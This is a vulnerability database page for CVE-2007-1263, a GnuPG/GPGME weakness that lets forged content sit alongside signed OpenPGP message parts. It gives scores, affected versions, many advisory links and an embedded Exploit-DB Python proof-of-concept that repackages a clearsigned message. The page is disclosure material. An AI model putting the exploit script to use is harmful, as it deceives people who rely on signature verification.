CVE-2007-1263 : Detail

CVE-2007-1263

29.41%V3
Network
2007-03-06 19:00 +00:00
2018-10-16 12:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

GnuPG 1.4.6 and earlier and GPGME before 1.1.4, when run from the command line, does not visually distinguish signed and unsigned portions of OpenPGP messages with multiple components, which might allow remote attackers to forge the contents of a message without detection.

Informations

Metrics

Metric Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29689

Publication date : 2007-03-04 23:00 +00:00
Author : Gerardo Richarte
EDB Verified : Yes

source: https://www.securityfocus.com/bid/22757/info GnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing. An attacker may be able to exploit this issue in applications using GnuPG to add arbitrary content into a signed and/or encrypted message. Exploiting this issue depends on the individual application's use of GnuPG. Individual records will be created detailing this issue in affected applications. #!/usr/bin/python import os, gpg, sys, base64 clear_sign = open(sys.argv[1], "rb").read().splitlines() start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----") mid = clear_sign.index("-----BEGIN PGP SIGNATURE-----") end = clear_sign.index("-----END PGP SIGNATURE-----") text = '\r\n'.join(clear_sign[start+3:mid]) sign = '\n'.join(clear_sign[mid+3:end-1]) onepass = gpg.OnePassSignature() onepass['keyid'] = (0x12341234,0x12341234) onepass['digest_algo'] = 2 onepass['pubkey_algo'] = 1 onepass['sigclass'] = 1 plain1 = gpg.Plaintext() plain1['name'] = 'original' plain1['data'] = text plain1['mode'] = 0x62 signature = gpg.Raw() signature['data'] = base64.decodestring(sign) compressed = gpg.Compressed() compressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB compressed['data'] = [onepass, plain1, signature] pkt = gpg.Packet() pkt['version'] = 1 pkt['data'] = compressed os.write(1,str(pkt))

Products Mentioned

Configuraton 0

Gnu>>Gpgme >> Version To (including) 1.1.3

Gnupg>>Gnupg >> Version To (including) 1.4.6

References

http://www.trustix.org/errata/2007/0009/
Tags : vendor-advisory, x_refsource_TRUSTIX
http://fedoranews.org/cms/node/2776
Tags : vendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/24407
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24438
Tags : third-party-advisory, x_refsource_SECUNIA
http://fedoranews.org/cms/node/2775
Tags : vendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/24650
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/2353
Tags : third-party-advisory, x_refsource_SREASON
http://www.redhat.com/support/errata/RHSA-2007-0107.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.debian.org/security/2007/dsa-1266
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/24511
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-432-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/24734
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24419
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24544
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-432-2
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/24420
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24875
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24365
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDKSA-2007:059
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.redhat.com/support/errata/RHSA-2007-0106.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/22757
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1017727
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/0835
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24489
Tags : third-party-advisory, x_refsource_SECUNIA
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.